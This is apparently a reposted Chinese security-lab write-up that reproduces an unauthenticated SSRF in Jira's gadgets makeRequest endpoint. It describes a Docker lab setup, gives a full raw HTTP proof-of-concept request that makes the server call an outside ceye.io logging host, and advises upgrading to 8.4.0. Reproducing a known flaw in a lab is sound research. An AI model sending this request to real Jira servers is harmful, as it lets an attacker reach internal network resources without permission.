Jira未授权SSRF漏洞复现

释放双眼,带上耳机,听听看~!

网安引领时代,弥天点亮未来   




 


0x00 漏洞介绍


      Jira/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。

      docker进行搭建,下载地址:

      docker pull cptactionhank/atlassian-jira:7.8.0

      环境启动:

     docker run –detach 

       –publish 8080:8080cptactionhank/atlassian-jira:7.8.0


0x01 漏洞复现


1. http://yourip:8080
访问安装(选择第二个安装)

   继续下一步:

  稍等片刻,继续下一步:

下一步:

 下一步:(PS:需要生成使用许可

 下一步:

下一步:

 下一步:

 下一步,至此安装完成。

2.访问:

http://192.168.100.128:8080/secure/Dashboard.jspa进行抓包,替换POC,得到以下信息,说明漏洞存在。

http://ceye.io/records/dns中可看到有NDS流量记录。


0x02 修复建议


1.升级到8.4.0及以上版本


0x03 思考总结


1.搭建环境时注意要申请使用许可

2.学海(安全圈)无涯苦作舟。

3.漏洞点在/plugins/servlet/gadgets/makeRequest

4.漏洞参考:

https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A

5.所使用的POC如下:

GET/plugins/servlet/gadgets/makeRequest?url=http://192.168.100.128:8080@test.sykwca.ceye.ioHTTP/1.1

Host:192.168.100.128:8080

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip, deflate

Connection: close

Referer: http://192.168.100.128:8080/secure/Dashboard.jspa

X-Atlassian-Token:no-check

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0

 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室


本文源自微信公众号:弥天安全实验室

人已赞赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新消息 消息中心
有新私信 私信列表
搜索